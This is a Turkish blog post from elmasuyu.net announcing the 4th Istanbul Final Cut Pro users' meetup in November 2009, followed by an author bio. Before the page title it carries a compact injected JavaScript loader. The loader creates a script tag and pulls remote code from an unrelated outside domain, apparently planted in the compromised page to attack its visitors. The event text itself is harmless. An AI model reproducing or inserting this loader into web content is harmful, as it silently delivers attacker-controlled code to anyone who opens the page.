;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 4. İstanbul Final Cut Pro Kullanıcıları Buluşması - elmasuyu.net
Kategoriler
Haber

4. İstanbul Final Cut Pro Kullanıcıları Buluşması

Kasım ayında gerçekleştireceğimiz 4. buluşmamızda Temmuz ayında hayatımıza giren Final Cut Studio 3 paketinin ve tabii ki özellikle Final Cut Pro 7′nin yeni özelliklerini inceleyeceğiz.

Bir kısmımız kullanmaya başladı bir kısmımız ise henüz Final Cut Pro 7 ile henüz tanışmadı. Gerçekten bir kurgu programında olması gereken güzel özellikler var bu yeni versiyonda.

Final Cut Pro 7 ile ilgili kafanıza takılan, öğrenmek istediğiniz konularla ilgili bilgi almak için 22 Kasım 2009, Pazar günü herkesi saat 15.00′de Harbiye / İstanbul’da Lotus Eğitim Kurumları Seminer Salonu’na bekliyoruz.

www.istanbulfcpug.org

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner